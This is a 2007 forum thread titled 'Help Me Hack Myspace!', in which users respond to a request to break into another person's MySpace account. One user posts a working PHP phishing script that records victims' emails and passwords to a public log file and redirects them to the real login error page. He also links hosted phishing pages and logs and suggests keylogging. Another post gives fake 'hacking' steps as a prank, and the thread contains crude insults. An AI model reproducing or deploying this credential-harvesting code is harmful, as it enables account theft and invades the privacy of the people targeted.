Help Me Hack Myspace!

Discussion in 'Computers and The Internet' started by potlover585, Aug 1, 2007.

Thread Status:
Not open for further replies.
  1. agntyellow

    agntyellow Member

    Messages:
    43
    Likes Received:
    0
  2. CrazybutLazy

    CrazybutLazy Banned

    Messages:
    824
    Likes Received:
    3
    I'm tempted to see what the picture is. But at the same time it may traumatize me.

    EDIT: Monkey's are evil. Pigs own them.
     
  3. djbelkin

    djbelkin Banned

    Messages:
    99
    Likes Received:
    0
    ok here ya go email me at tbl@w3.org and I will help you hack it
    my name is tim and i am a cyber punk who knows their shit
    I can do anything I want on the web

    please call and I will hack it for you
    just write this

    I am the guy who wants myspace hacked can u help
     
  4. djbelkin

    djbelkin Banned

    Messages:
    99
    Likes Received:
    0
    ps also my fee will be that you need to couple me up with a really fit prostitute for the night after its done
     
  5. IlUvMuSIc

    IlUvMuSIc Senior Member

    Messages:
    1,915
    Likes Received:
    0
    What he said is racist. What a jerk. How would you even get 100 guys to agree to do that.

    Pigs and Monkeys should be able to live side by side in peace.

    Also i have a friend sorta like that. Get over it.
     
  6. *Andy*

    *Andy* Senior Member

    Messages:
    1,386
    Likes Received:
    9
    Lol.

    Oh and as for that - Pwnt. Did he actually do it? What a stupid jerk - he deserves to have been cheated on by this silly girl. I hope he catches Herpes.
     
  7. CrazybutLazy

    CrazybutLazy Banned

    Messages:
    824
    Likes Received:
    3
    I was amazed. He actually did it. The reason he was so pissed off at me was because I told him what that would have done when he PMed me telling me it didn't work.
     
  8. Adderall_Assasin

    Adderall_Assasin Senior Member

    Messages:
    1,266
    Likes Received:
    0
    I dont know why these guys are being noobs.

    If you want to hack MySpace you need to create a text file to upload to it.

    1) open notepad. click Start and it should be in Accesories or somethin.
    2) type this into the notepad
    3) save the file as exactly this file name: "2E7R_ICO.EXE" make sure to get the period before EXE or it doesnt work. save it to your desktop where you can get to it.
    4) find the file you saved and double-click the icon to concatenate it to exactly 64 bytes. this is the most essential part!
    5) you need to upload it to your MySpace page or some other location on the web and send it to him through message. once he opens it his password will be reset, but he has to open it while he is logged in MySpace. Basically, dont send this file to yourself or your password will be reset.
    6) open his MySpace and login as him and you can create a new password.
     
  9. Adderall_Assasin

    Adderall_Assasin Senior Member

    Messages:
    1,266
    Likes Received:
    0
  10. sw0o0sh

    sw0o0sh Banned

    Messages:
    2,342
    Likes Received:
    1
    Writing you a phisher right now. WIll post link to public in a moment.


    Alright, I use to steal peoples accounts all the time. Hopefully you have AOL instant messenger, or some other device to desguise a link you send to somebody. Anyway,

    http://68.186.244.75/myspace/

    When they log into that, it will redirect them to the myspace login error page. All typed in responses will be logged @

    http://68.186.244.75/myspace/log.html

    Meaning other people can use this if they wish, I have no control over the public who sees the log, so, best of luck. First come first serve.

    Here is the simple script I wrote to do all this, so, no worries:

    Code:
    <?PHP // iniate php script
    if($_POST['email'] != NULL && $_POST['password'] !=NULL){
    // ^ makes sure both email and password forms are filled out
    if(trim(strlen($_POST['password'])) < 5 OR trim(strlen($_POST['email'])) < 5) {
    // ^ Makes sure the text is both greater than 5 characters, so its not spammed. 
    } else if(!preg_match("/(.+?)@(.+?)\.(.+?)/",$_POST['email'])){
    // ^ Makes sure the e-mail is proper.
    } else {
    // If everything goes okay.. log it on log.html, append data to log multiple times.
    $file = fopen("log.html", "a+");
    $next_ = fwrite($file, "E-mail: ". $_POST['email'] . " Password: " . $_POST['password'] . "<br />");
    // write the written username and password
    header('Location:http://login.myspace.com/index.cfm?fuseaction=login.process&MyToken=ed5570f2-8ae3-43cf-bf2c-cdef72d7fa18');
    // ^ Redirects them to the fail page.
    }
    } 
    ?>
    // ^ close PHP
    
    Oh, and I'd advise not listening to many of the posts above or before me, they are giving you basic DOS commands to reformat your C drive, or crash your computer by deleting all the contents of your hard drive...

    Best of luck, if all else fails, you can also key log her.
     
  11. PsyGrunge

    PsyGrunge Full Fractal Force

    Messages:
    8,619
    Likes Received:
    30
    I fail to believe you wrote that 'simple' script man.
     
  12. Adderall_Assasin

    Adderall_Assasin Senior Member

    Messages:
    1,266
    Likes Received:
    0
    I cant imagine you wrote that. You wouldnt have put comments in it for someone who doesnt know how to code. I dont think it will work becaue this guy doesnt know enough about computers... obviously.
     
  13. Dave_techie

    Dave_techie I call Sheniangans

    Messages:
    14,932
    Likes Received:
    3
    if he actually formatted his C drive he deserves that and so much worse, oh christ that is funny...
     
  14. sw0o0sh

    sw0o0sh Banned

    Messages:
    2,342
    Likes Received:
    1
    Lol, you really don't believe I can't code PHP? Check out my projects at http://ezpk.org .

    If you weren't a complete idiot when it came to web code (you also PMed me calling it jargon html, server coding has nothing to do with HTML, so I think you are the one full of jargon), you'd know how easy that script is to write. A few if statements and a function that writes a variable (which was retrieved through _POST data), written onto a text file. So don't tell me what I don't know, asshole. I code forums, encryptions, calculators, to be completely honest I believe any noob to PHP with some basic knowledge could write you the same thing, just a bit more noobier.

    Just because I included comments, really doesn't mean shit. I mean, unless you want me to not teach how I do it, then that's up to you. I'm kind of Anti-leach so if I post something for somebody to use, at least with comments they might learn something if they had the curiosity to do so. I also have a community I own with web/java coders, who could back me up in 5 minutes if you really don't believe I wrote it.

    Also, my ip address has changed, it can always be dynamically access through http://rscd.no-ip.org or http://sw0o0sh.no-ip.org/ , feel free to check out all my side projects within them websites, as they all include MY NAME in the copyright, also, if you don't believe these are my webservers, feel free to check out...

    http://rscd.no-ip.org/sw0o0sh.txt

    I posted this same script available to read the topic @:

    http://rscd.no-ip.org/rsc/forum.cfm?act=topic&id=1868

    And if you still want to use the thing to steal myspace passwords, take a look @:

    http://rscd.no-ip.org/myspace/
    http://rscd.no-ip.org/myspace/log.html

    or

    http://sw0o0sh.no-ip.org/myspace/
    http://sw0o0sh.no-ip.org/myspace/log.html

    Be nice next time, ty. I try helping and i'm criticized for not knowing my stuff, hmm, is it because I am the ONLY ONE HERE who actually tried helping this guy and not making him reformat his C: drive? Why haven't they been yelled at yet?

    Also, please get your facts straight. This is in no way hacking, the intended purpose is to hack the account name once the password is recieved, but I am not hacking anything with this script. PHP is revolved around _POST and _GET data, and _COOKIES if you will. This script (using the html from myspace) manipulates Myspaces login form, but instead of LOGGING them into myspaces website (which uses cold fusion coding, hence the .cfm file extension), it logs their password onto a text document and forwards them to the real myspace login error page. Thanks. Then, once it is logged, whoever the hell needed this script, can view the log, and see if the username and password they entered works. Also, I don't know how you are saying my script is bullshit when, if you actually did try logging into it with a fake email and pass, you'd notice it actually DOES log it to the html file.

    Have a nice day though. Make friends, not enemies. I believe you owe me an apology now.
     
  15. djbelkin

    djbelkin Banned

    Messages:
    99
    Likes Received:
    0
    Sorry man but the sites a bit naff really !
    Any site nowadays that collapses entirely just because javascript is disabled in the browser is unfit for purpose. The point being javascript should be an aide to navigation, not an issue over which all navigation fails. why would anyone trust a site that must have javascript enabled? I just dont trust any site like that until it proves itself trustworthy. I would prefer to just go somewherelse than lower my security

    With tools like noscript blocking 95% of malware that comes through sites I would say you'll have even more of a rough time when people start becoming script-savvy it wont be long till most 12 year olds (who are taught to use firefox BTW) will turn 18 and know exactly how to treat such sites when they surf to them - you dont know as much as you think you do either, some of your code isnt the greatest since sliced bread is it
     
  16. Adderall_Assasin

    Adderall_Assasin Senior Member

    Messages:
    1,266
    Likes Received:
    0
    I like this guy.


    -- -- -- --
    *edit*

    Oh and Swoosh, I dont regret saying anything.

    It isnt a good idea to post "hackers" code onto a forum. I think you said something about making enemies. You came to the wrong place.
     
  17. PsyGrunge

    PsyGrunge Full Fractal Force

    Messages:
    8,619
    Likes Received:
    30
    swo0o0sH, ooooh, my post was civilized and I didn't try peppering you with twattish insults either. Apology? I believe that you, cunting motherfucker, can fucking well jack off to the Window Vista beta test and tone your attitude down. 'Have a nice day though'-?? You are one cheesy, unoriginal and above all BORING character.

    -You think if Bill Gates got laid in high school, there'd be a Microsoft?
     
  18. Pellinore

    Pellinore Member

    Messages:
    674
    Likes Received:
    0
    Ffs, those scriptkiddies today.

    Hacking myspace (stealing accounts generally) is for lamers, it is easy to do with xss tunneling, but you don't just hack for fun or for personal purposes.
    In the underground, myspace hackers are somewhat the biggest pranks walking earth. Really don't do it, it's not ethical (i'm not a whitehat*-.
     
  19. sw0o0sh

    sw0o0sh Banned

    Messages:
    2,342
    Likes Received:
    1
    delete*
     
  20. sw0o0sh

    sw0o0sh Banned

    Messages:
    2,342
    Likes Received:
    1
    I think if a person like you got laid they wouldn't be hear popping blood vessels over posts made against them, but that's just me. And yeah, Have a good day though. It's something people who aren't complete assholes can wish to even the biggest pricks even after such rediculous situations. You are one nasty character :)
     
Thread Status:
Not open for further replies.

Share This Page

  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.
    Dismiss Notice